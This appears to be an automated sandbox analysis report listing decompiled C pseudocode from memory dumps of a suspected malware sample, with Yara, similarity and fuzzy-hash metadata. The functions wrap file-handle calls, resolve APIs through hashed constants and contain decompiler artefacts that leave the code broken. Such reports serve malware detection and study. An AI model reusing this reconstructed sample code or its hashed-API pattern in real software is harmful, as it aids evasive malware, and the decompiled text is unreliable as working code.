Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction ID: 41cc413c6d2dbbb07f637a807e6d8be530f12f58dbaa0ab74ead1b58018004a6
Opcode Fuzzy Hash: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction Fuzzy Hash: 4911E43020E396FBD611CAA5DC91EABBFDCEF45754F20881DB59897140EB20E800CB75

Uniqueness

Uniqueness Score: -1.00%

Function 6EB35B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6EB35B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6EB2D1CC(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6EB2D6D0(__ecx, _t60);
					E6EB2CFF8(_t56,  *_t60);
					E6EB2CFDC(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6EB362B0(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6EB33064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6EB2C26C(_t40);
					if(E6EB2C280(_t40) != 0) {
						_t56[2] = E6EB335F0(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6EB33064(0x8e844d1e, 0xba53868);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6EB33698(_t59, 0xff, 8);
						if(E6EB33064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6eb35b43
0x6eb35b45
0x6eb35b52
0x6eb35b56
0x6eb35b5a
0x6eb35b64
0x6eb35b6b
0x6eb35b6b
0x6eb35b72
0x6eb35b74
0x6eb35b79
0x6eb35b82
0x6eb35b8a
0x6eb35b8a
0x6eb35b7b
0x6eb35b7d
0x6eb35b7d
0x6eb35b79
0x6eb35b8f
0x6eb35b9b
0x6eb35ccc
0x6eb35c09
0x6eb35c12
0x6eb35c13
0x6eb35c18
0x6eb35c19
0x6eb35c0b
0x6eb35c0d
0x6eb35c0d
0x6eb35c2f
0x6eb35c43
0x6eb35c31
0x6eb35c3e
0x6eb35c40
0x6eb35c40
0x6eb35c45
0x6eb35c4a
0x6eb35c58
0x6eb35cc3
0x00000000
0x6eb35c5a
0x6eb35c5f
0x6eb35cac
0x6eb35cae
0x6eb35cb0
0x6eb35cba
0x6eb35cba
0x6eb35cb0
0x6eb35c61
0x6eb35c6d
0x6eb35c86
0x6eb35c88
0x6eb35c89
0x6eb35c8a
0x6eb35c8c
0x6eb35c8e
0x6eb35c8f
0x6eb35c8f
0x00000000
0x6eb35c92
0x6eb35ba1
0x6eb35bb1
0x6eb35bb1

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f561485c077852e4d45ddc2486b7fc954be08d3d8b1d6608d9a9b04d66536b2
Instruction ID: 28cd61997df7113e30a8f9140a903515153583d2f57c4836c19469230a99a992
Opcode Fuzzy Hash: 5f561485c077852e4d45ddc2486b7fc954be08d3d8b1d6608d9a9b04d66536b2
Instruction Fuzzy Hash: F03174302953EABEEA402AF54D87F7F3E9DDF8124CF700838F9459A185EE20D844C229

Uniqueness

Uniqueness Score: -1.00%

Function 00761D4F, Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 25%

			_entry_(void* __eflags, intOrPtr _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				long _v44;
				long _v48;
				int _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr _t33;
				intOrPtr _t34;
				int _t42;
				long _t53;
				long _t55;
				intOrPtr* _t56;

				_t27 = _a4;
				 *_t56 = _t27;
				_v20 = _t27;
				_v24 = E007623D8(__eflags);
				_t29 = L00761017();
				_v28 = _t29;
				if(_t29 != 0) {
					 *_t56 = _v28;
					_t31 =  *((intOrPtr*)(_v20 + 0x58))();
					_t56 = _t56 - 4;
					_v56 = _t31;
				}
				 *_t56 = _v20;
				_t33 = E00762172();
				 *_t56 = _v20;
				_v32 = _t33;
				_t34 = E0076129E(); // executed
				_t53 =  *((intOrPtr*)(_v20 + 0x3c));
				_t55 =  *((intOrPtr*)(_t53 + 0x3c));
				_t54 = _t55;
				_t47 = _t53;
				_v36 = _t34;
				_v40 = _t53;
				_v44 = _t55;
				_v48 = _t53;
				if(_t55 != 0) {
					_v48 = _v40 + (_v44 + 0x0000ffff & 0x0000ffff) + 1;
				}
				if( *((short*)(_v48 + 0x5c)) != 3) {
					_t42 = FreeConsole(); // executed
					_v52 = _t42;
				}
				 *_t56 = _v20;
				E00762341();
				 *_t56 = _v20; // executed
				E0076141B(_t47, _t54, _t55); // executed
				return 0;
			}

0x00761d58
0x00761d5b
0x00761d5e
0x00761d66
0x00761d69
0x00761d71
0x00761d74
0x00761dfe
0x00761e04
0x00761e07
0x00761e0a
0x00761e0a
0x00761d7d
0x00761d80
0x00761d88
0x00761d8b
0x00761d8e
0x00761d96
0x00761d99
0x00761d9c
0x00761da3
0x00761da5
0x00761da8
0x00761dab
0x00761dae
0x00761db1
0x00761df6
0x00761df6
0x00761e1a
0x00761dda
0x00761ddc
0x00761ddc
0x00761db8
0x00761dbb
0x00761dc3
0x00761dc6
0x00761dd4

APIs

FreeConsole.KERNELBASE ref: 00761DDA

Memory Dump Source

Source File: 00000000.00000002.686308627.0000000000760000.00000040.00000001.sdmp, Offset: 00760000, based on PE: true

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: f3c93d33342892b26ce3406e08092c315ba3ad984d55e8811dafd1aeca611aa9
Instruction ID: 8ca492313d8339bd87dc9f690464a76364fb1a5dfa1d17cc64c8fbe2807b3af9
Opcode Fuzzy Hash: f3c93d33342892b26ce3406e08092c315ba3ad984d55e8811dafd1aeca611aa9
Instruction Fuzzy Hash: 1221E9B1E0460ACFCB44EFB9C8895ADBBF1FF48310F594829E856A7341E7399981CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6EB31166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EB31166(intOrPtr* __eax, void* __ebx, void* __ecx) {
				void* _t20;

				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(_t20 + 0x50182444)) =  *((intOrPtr*)(_t20 + 0x50182444)) + __ecx;
			}

0x6eb31168
0x6eb3116a

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6EB3117B

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 8162e476bed466b15e8bf967a0abe15d034c35eef06e00be9545f18c94d02dd7
Instruction ID: ca57ed8a32d2d0b88938bbba72ba91aa46fe4f2b1303074aa134528b2370b008
Opcode Fuzzy Hash: 8162e476bed466b15e8bf967a0abe15d034c35eef06e00be9545f18c94d02dd7
Instruction Fuzzy Hash: 9E1194605446E35AFB7685E89C71BAF7E5CDF42740F384875A860E60E4CE24C889C662

Uniqueness

Uniqueness Score: -1.00%

Function 6EB35BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6EB35BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6EB33064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6EB2C26C(_t24);
				if(E6EB2C280(_t24) != 0) {
					_t34[2] = E6EB335F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6EB33064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6EB33698(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6EB33064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6eb35bbd
0x6eb35bc1
0x6eb35bc4
0x6eb35bc7
0x6eb35c09
0x6eb35c12
0x6eb35c18
0x6eb35c19
0x6eb35c0b
0x6eb35c0d
0x6eb35c0d
0x6eb35c2f
0x6eb35c43
0x6eb35c31
0x6eb35c3e
0x6eb35c40
0x6eb35c40
0x6eb35c45
0x6eb35c4a
0x6eb35c58
0x6eb35cc3
0x6eb35cc6
0x6eb35c5a
0x6eb35c5f
0x6eb35cac
0x6eb35cb0
0x6eb35cba
0x6eb35cba
0x6eb35cb0
0x6eb35c61
0x6eb35c6d
0x6eb35c72
0x6eb35c86
0x6eb35c88
0x6eb35c89
0x6eb35c8a
0x6eb35c8c
0x6eb35c8e
0x6eb35c8f
0x6eb35c8f
0x6eb35c92
0x6eb35c92
0x6eb35c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EB35C3E

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction ID: e519bd0360778b26eee6e759561ac26654b5fb5e6e5640d2dfff72a4ecf05983
Opcode Fuzzy Hash: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction Fuzzy Hash: E90145313953AABEFA5026E54C07F7F7F8CCFC225CF608831BA0195185DE12A895C124

Uniqueness

Uniqueness Score: -1.00%

Function 6EB35BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6EB35BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6EB33064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6EB2C26C(_t24);
					if(E6EB2C280(_t24) != 0) {
						_t33[2] = E6EB335F0(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6EB33064(0x8e844d1e, 0xba53868);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6EB33698(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6EB33064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6eb35be5
0x6eb35be7
0x6eb35bfe
0x6eb35c09
0x6eb35c12
0x6eb35c18
0x6eb35c19
0x6eb35c0b
0x6eb35c0d
0x6eb35c0d
0x6eb35c2f
0x6eb35c43
0x6eb35c31
0x6eb35c3e
0x6eb35c40
0x6eb35c40
0x6eb35c45
0x6eb35c4a
0x6eb35c58
0x6eb35cc3
0x6eb35cc6
0x6eb35c5a
0x6eb35c5f
0x6eb35cac
0x6eb35cb0
0x6eb35cba
0x6eb35cba
0x6eb35cb0
0x6eb35c61
0x6eb35c6d
0x6eb35c72
0x6eb35c86
0x6eb35c88
0x6eb35c89
0x6eb35c8a
0x6eb35c8c
0x6eb35c8e
0x6eb35c8f
0x6eb35c8f
0x6eb35c92
0x6eb35c92
0x6eb35be9
0x6eb35be9
0x6eb35bf0
0x6eb35bf0
0x6eb35c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EB35C3E

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction ID: 35360fa8e9ab476f7f62ce72c6b704ed0bd409d779b3e8a32e5175c13190846f
Opcode Fuzzy Hash: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction Fuzzy Hash: 500149302962E6BEF75016E54C47F7B7F4CDF8124CF704C35B91155185DF22A598C168

Uniqueness

Uniqueness Score: -1.00%

Function 6EB35BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6EB35BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6EB33064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6EB2C26C(_t24);
				if(E6EB2C280(_t24) != 0) {
					_t34[2] = E6EB335F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6EB33064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6EB33698(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6EB33064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6eb35bd1
0x6eb35bd8
0x6eb35bdb
0x6eb35c09
0x6eb35c12
0x6eb35c18
0x6eb35c19
0x6eb35c0b
0x6eb35c0d
0x6eb35c0d
0x6eb35c2f
0x6eb35c43
0x6eb35c31
0x6eb35c3e
0x6eb35c40
0x6eb35c40
0x6eb35c45
0x6eb35c4a
0x6eb35c58
0x6eb35cc3
0x6eb35cc6
0x6eb35c5a
0x6eb35c5f
0x6eb35cac
0x6eb35cb0
0x6eb35cba
0x6eb35cba
0x6eb35cb0
0x6eb35c61
0x6eb35c6d
0x6eb35c72
0x6eb35c86
0x6eb35c88
0x6eb35c89
0x6eb35c8a
0x6eb35c8c
0x6eb35c8e
0x6eb35c8f
0x6eb35c8f
0x6eb35c92
0x6eb35c92
0x6eb35c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EB35C3E

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction ID: 47ac9d6082bdb9a6283de17142290bdb3a096c7f87b06f2e3ca7f65d6aea3d7b
Opcode Fuzzy Hash: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction Fuzzy Hash: 780168302922AA7EF75026F54D47F7F7E4DCF8125CF704831FA01951C5DE22A898C124

Uniqueness

Uniqueness Score: -1.00%

Function 6EB35BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6EB35BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6EB33064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6EB2C26C(_t23);
				if(E6EB2C280(_t23) != 0) {
					_t31[2] = E6EB335F0(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6EB33064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6EB33698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6EB33064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6eb35bb3
0x6eb35bba
0x6eb35c09
0x6eb35c12
0x6eb35c18
0x6eb35c19
0x6eb35c0b
0x6eb35c0d
0x6eb35c0d
0x6eb35c2f
0x6eb35c43
0x6eb35c31
0x6eb35c3e
0x6eb35c40
0x6eb35c40
0x6eb35c45
0x6eb35c4a
0x6eb35c58
0x6eb35cc3
0x6eb35cc6
0x6eb35c5a
0x6eb35c5f
0x6eb35cac
0x6eb35cb0
0x6eb35cba
0x6eb35cba
0x6eb35cb0
0x6eb35c61
0x6eb35c6d
0x6eb35c72
0x6eb35c86
0x6eb35c88
0x6eb35c89
0x6eb35c8a
0x6eb35c8c
0x6eb35c8e
0x6eb35c8f
0x6eb35c8f
0x6eb35c92
0x6eb35c92
0x6eb35c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EB35C3E

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction ID: 09d24eb0f40153e175649a480a9af9ff2486a0b5106263aad2ef4ff12e2a7afc
Opcode Fuzzy Hash: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction Fuzzy Hash: 1B0147312962AABEFA5126E54C47F7F7F4CCF8125CF704835BA11651C5DE22A994C138

Uniqueness

Uniqueness Score: -1.00%

Function 6EB35C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6EB35C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6EB33064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6EB2C26C(_t23);
				if(E6EB2C280(_t23) != 0) {
					_t31[2] = E6EB335F0(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6EB33064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6EB33698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6EB33064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6eb35c01
0x6eb35c05
0x6eb35c09
0x6eb35c12
0x6eb35c18
0x6eb35c19
0x6eb35c0b
0x6eb35c0d
0x6eb35c0d
0x6eb35c2f
0x6eb35c43
0x6eb35c31
0x6eb35c3e
0x6eb35c40
0x6eb35c40
0x6eb35c45
0x6eb35c4a
0x6eb35c58
0x6eb35cc3
0x6eb35cc6
0x6eb35c5a
0x6eb35c5f
0x6eb35cac
0x6eb35cb0
0x6eb35cba
0x6eb35cba
0x6eb35cb0
0x6eb35c61
0x6eb35c6d
0x6eb35c72
0x6eb35c86
0x6eb35c88
0x6eb35c89
0x6eb35c8a
0x6eb35c8c
0x6eb35c8e
0x6eb35c8f
0x6eb35c8f
0x6eb35c92
0x6eb35c92
0x6eb35c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EB35C3E

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction ID: 070d9b387307a2220658f9e95f0800a4dd1ee1ec7315139f2a53359768349875
Opcode Fuzzy Hash: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction Fuzzy Hash: CF01C6302922AABEFA5026F04C03F7F7F4CCF8124CF700830BA01A4085DE22A998C124

Uniqueness

Uniqueness Score: -1.00%

Function 6EB35E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6EB35E10(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6EB2C280(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6EB33064(0x8e844d1e, 0xba53868) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6eb35e14
0x6eb35e15
0x6eb35e17
0x6eb35e1d
0x6eb35e1f
0x6eb35e23
0x6eb35e23
0x6eb35e27
0x6eb35e33
0x6eb35e67
0x6eb35e67
0x00000000
0x6eb35e35
0x6eb35e3a
0x6eb35e3b
0x6eb35e4f
0x6eb35e60
0x6eb35e51
0x6eb35e5c
0x6eb35e5c
0x6eb35e65
0x6eb35e6d
0x6eb35e6f
0x6eb35e72
0x6eb35e77
0x6eb35e77
0x6eb35e7b
0x6eb35e80
0x00000000
0x00000000
0x00000000
0x6eb35e65

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6EB35D48,?,?), ref: 6EB35E5C

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
